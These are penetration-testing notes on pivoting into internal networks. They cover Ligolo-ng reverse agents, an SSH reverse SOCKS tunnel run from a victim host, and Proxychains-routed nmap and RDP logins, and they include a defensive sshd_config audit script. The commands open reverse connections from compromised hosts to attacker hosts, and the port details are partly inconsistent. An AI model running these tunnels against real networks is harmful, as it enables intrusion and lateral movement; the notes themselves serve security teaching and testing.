# Pivoting (Proxying)

## Method 1: Ligolo-ng

**Ligolo** is a *simple* and *lightweight* tool for establishing *SOCKS5* or *TCP* tunnels over a reverse connection that is protected by TLS (elliptic-curve certificate).

* <https://github.com/sysdream/ligolo>

**1) To run the agent on your victim host (it connects back to the proxy server started in step 2):**

`./ligolo.exe -connect <IP>:<PORT> -ignore-cert`

**2) To run the server on your attack host:**

* Start the proxy server
  * `sudo ./proxy -selfcert -laddr 0.0.0.0:<port>`
* Once the agent has connected, list the session and inspect the victim's network interfaces
  * `session`
  * `ifconfig`
* Add a route to the target network via the ligolo TUN adapter
  * `sudo ip route add <Your_local_IPrange>/24 dev ligolo`
* Start the tunnel in ligolo
  * `tunnel_start`

## Method 2: SSH Reverse Proxy

SSH can natively perform pivoting. In the example below, we have three machines:

1. The SSH server
2. The attack host
3. The victim host (in an internal network)

* On your SSH server, set up an SSH key:
  * `ssh-keygen -C attacker@attacker`
* Add the generated public key to your SSH server's authorized keys list
  * `/home/<user>/.ssh/authorized_keys`
* On your victim host, upload the generated private key and run the following command:
  * `ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>`
  * A bare `-R <port>` with no destination makes the SSH server listen on that port as a SOCKS proxy whose traffic exits through the victim host (OpenSSH 7.6 and later)
* On your attack host, make the reverse connection to the SSH server
  * `ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>`
  * Local port 8008 on the attack host is now forwarded to port 1037 on the SSH server, giving you a path from your attack host to the victim host and its network
* Now proxy any tools through the SOCKS proxy you created at 127.0.0.1:8008.
  * Or use proxychains.
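From the defender's side of the SSH method above, the reverse tunnel only works if the SSH server permits remote (`-R`) forwarding. The following Python audit is an added example, not code from the original page: it parses an `sshd_config` with sshd's first-occurrence-wins rule, ignores conditional `Match` blocks, and reports whether `AllowTcpForwarding`, `GatewayPorts`, `PermitListen` and `PermitOpen` are left permissive (the sample configs are constructed).

```python
"""Check whether an OpenSSH sshd_config would let a client open the remote
(-R) forwarding that the SSH reverse-proxy method relies on."""
import re

# OpenSSH defaults that apply when a keyword is absent from the file.
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no",
            "permitlisten": "any", "permitopen": "any"}

def parse_sshd_config(text):
    """Return (global_values, keys_set_in_match_blocks). Like sshd, the first
    occurrence of a keyword wins; keywords inside a Match block only apply
    conditionally, so they are reported separately rather than as globals."""
    globals_, in_match_keys = {}, set()
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1] if len(parts) > 1 else "")
        if key == "match":
            in_match = True          # everything below applies conditionally
        elif in_match:
            in_match_keys.add(key)
        else:
            globals_.setdefault(key, value)
    return globals_, in_match_keys

def audit_sshd_config(text):
    """Return a list of (keyword, effective_value, restricted) for the
    forwarding keywords; restricted is False where -R is still permitted."""
    values, _ = parse_sshd_config(text)
    findings = []
    for key, default in DEFAULTS.items():
        value = values.get(key, default).lower()
        if key == "allowtcpforwarding":
            ok = value in ("no", "local")   # yes/all/remote allow -R
        elif key == "gatewayports":
            ok = value == "no"              # else -R may bind non-loopback
        else:                               # permitlisten / permitopen
            ok = value != "any"             # 'any' places no restriction
        findings.append((key, value, ok))
    return findings

def remote_forwarding_allowed(text):
    """True if any forwarding keyword is left in a permissive state."""
    return any(not ok for _, _, ok in audit_sshd_config(text))

# Constructed sample configs (not taken from any real host).
WEAK_CONFIG = "Port 22\nAllowTcpForwarding yes\nGatewayPorts clientspecified\n"
HARDENED_CONFIG = ("AllowTcpForwarding no\nGatewayPorts no\nPermitListen none\n"
                   "PermitOpen none\nMatch User backup\n    AllowTcpForwarding local\n")
```

Running `audit_sshd_config(WEAK_CONFIG)` flags all four keywords, while the hardened sample passes and its `Match`-scoped `AllowTcpForwarding local` is reported separately rather than weakening the global setting.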

## Sending tools through a pivot (using Proxychains)

Proxychains forces every TCP connection made by a given application to go through a proxy.

* <https://github.com/haad/proxychains>

**1) Setup Proxychains with an established SOCKS Pivot**

* Edit `/etc/proxychains.conf`
* Add `socks4 127.0.0.1 9050` (use the port of the SOCKS proxy you actually established, e.g. 8008 in the SSH example above)

**2) Execute tools using proxychains to route their traffic to local port 9050, which the SSH forward carries on to the victim network.**

* `proxychains nmap -v -Pn -sT 172.16.5.19`
  * Only full TCP connect scans (`-sT`) work: SYN scans craft raw packets that never pass through the SOCKS proxy, and `-Pn` is needed because ICMP host discovery cannot traverse it either
* `proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123`
* `proxychains <yourtool>`
